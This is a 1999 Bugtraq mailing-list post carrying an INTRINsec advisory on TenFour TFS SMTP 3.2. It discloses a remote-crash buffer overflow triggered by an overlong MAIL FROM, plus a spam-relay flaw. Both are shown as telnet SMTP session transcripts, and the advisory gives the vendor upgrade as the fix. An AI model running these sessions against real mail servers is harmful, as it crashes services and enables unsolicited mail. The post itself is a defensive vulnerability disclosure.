Bugtraq mailing list archives
[SECURITY] TenFour TFS SMTP 3.2 Buffer Overflow
From: christophe.lesur () INTRINSEC COM (Christophe Lesur)
Date: Thu, 2 Sep 1999 22:39:23 +0200
INTRINsec Security Advisory
Release Date : August 30, 1999
Software : TenFour TFS SMTP 3.2
Operating System: Windows NT 3.x / 4.x
Impact : The attackers can use a misconfigured TFS SMTP for
spamming and can remotely crash the TFS SMTP Gateway.
Author : Christophe.Lesur () INTRINsec com
Status : TenFour is advised from this.
URLs : http://www.intrinsec.com/
__ Diggest __
The TenFour TFS SMTP Release 3.2 has two vulnerabilities : A buffer overflow
and, under some circumstances and due to inherent TFS architecture, it can
be used for spamming.
Direct results are that an attacker can remotly crash your TFS SMTP Gateway
or send unsollicited mails to someone ( and TFS ADMINISTRATOR ).
Tenfour is advised from this. Thanks to Roberto Correnti for his support.
(http://www.tenfour.com)
__ Technical Details and Exploits __
TENFOUR TFS SMTP Version 3.2 has two vulnerabilities : a buffer overflow and
under some circumstances it can be used for spamming.
First: Buffer Overflow.
There is a major buffer overflow in TFS SMTP 3.2. When you connect to the
SMTP service on port 25, you get the TFS PROMPT. After sending the 'helo'
command, if you send a 'MAIL FROM' larger than 128 bytes, you will crash the
SMTP service with a nice protection fault. It's basically a buffer overflow
and this has been fixed in release 4.0
This is the exploit :
[[clesur@raptor clesur]$ telnet mailhost.victim.com 25
Trying 1.1.1.1...
Connected to mailhost.victim.com.
Escape character is '^]'.
220 mailhost.victim.com is ready. TFS SMTP Server ver 3.2
helo
250 mailhost.victim.com, Hello
mail from:<ddddddddddddd ... lots of char ... dddddddddddddddd>
Connection closed by foreign host.
Second: Spamming
The TFS SMTP Engine accepts any mails by default and process them in its kernel.
In case of a deficient message (wrong recipient, wrong domain...) TFS SMTP is
usually configured to warn sender and the TFS ADMINISTRATOR by sending a 4-line warning
AND the full message. Because there is no domain check before sending the message to
the TFS core, it's possible to spam someone and the TFS administrator.
This is the exploit :
[[clesur@raptor clesur]$ telnet mailhost.tfsvictim.com 25
Trying 1.1.1.1...
Connected to mailhost.tfsvictim.com.
Escape character is '^]'.
220 mailhost.tfsvictim.com is ready. TFS SMTP Server ver 3.2
helo
250 mailhost.tfsvictim.com, Hello
mail from:<target () victim com>
250 Sender <target () victim com> OK
rcpt to:<target () victim com>
250 Recipient <target () victim com> OK
data
354 Begin data transfer. End with period.
from: target () victim com
to: target () victim com
<YOUR MESSAGE BODY HERE>
.
250 Message accepted
quit
221 Connection closed
Connection closed by foreign host.
The spammed user will receive this message in its mailbox.
Message 22:
From target () victim com Thu Jul 29 09:49:40 1999
Delivered-To: target () victim com
From: target () victim com
Date: Thu, 29 Jul 1999 11:44:03 +0200
Subject: <No subject>
MIME-version: 1.0
Content-transfer-encoding: quoted-printable
####################################################
This message was not delivered to
target () victim com
TFS Admin was informed with a copy of this message
Sender was informed with a copy of this message
####################################################
<YOUR MESSAGE BODY HERE>
__ Solutions __
For theses vulnerabilities, TenFour suggests upgrading to a version greater
than 4.0.
__ Contacts __
-- Tenfour --
TenFour South Europe
ITFamily Sarl
Le Technoparc
15, rue Edouard Jeanneret
78306 Poissy Cedex
France
Tel: +33 1 39 22 65 15
Fax: +33 1 39 11 49 77
WWW: http://www.tenfour.fr
-- INTRINsec --
INTRINsec is a computer Security company.
http://www.INTRINsec.com
This advisory is available in french.
Cet avis est disponible en francais sur notre site.
__ DISCLAMERS __
INTRINsec DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, AND PROVIDED
THESES INFORMATIONS "AS IS" WITHOUT WARRANTY OF ANY KIND. INTRINsec IS NOT
LIABLE FOR ANY DAMAGES WHATSOEVER EVEN IF INTRINsec HAS BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES.
--
Christophe Lesur Security Consultant
INTRINsec
mailto:christophe.lesur () INTRINsec com
Current thread:
- I found this today and iam reporting it to you first!!! (fwd) Alfred Huger (Aug 30)
- <Possible follow-ups>
- Re: I found this today and iam reporting it to you first!!! (fwd) blue0ne (Sep 02)
- Re: I found this today and iam reporting it to you first!!! (fwd) Technical Incursion Countermeasures (Sep 02)
- [SECURITY] TenFour TFS SMTP 3.2 Buffer Overflow Christophe Lesur (Sep 02)
- SCO 5.0.5 /bin/doctor local root comprimise Brock Tellier (Sep 03)
- Re: SCO 5.0.5 /bin/doctor local root comprimise Seth R Arnold (Sep 08)
- Re: I found this today and iam reporting it to you first!!! (fwd) Peter van Dijk (Sep 04)
- Re: I found this today and iam reporting it to you first!!! (fwd) Daniel Dulitz (Sep 04)
- Re: I found this today and iam reporting it to you first!!! (fwd) Bret Watson (Sep 07)
- Re: I found this today and iam reporting it to you first!!! (fwd) Daniel W. Dulitz x108 (Sep 06)
- Re: I found this today and iam reporting it to you first!!! (fwd) Wietse Venema (Sep 04)
- Re: I found this today and iam reporting it to you first!!! (fwd) Alan Brown (Sep 07)
- Re: I found this today and iam reporting it to you first!!! (fwd) Jamie A. Lawrence (Sep 04)
- Re: I found this today and iam reporting it to you first!!! (fwd) Bret Watson (Sep 07)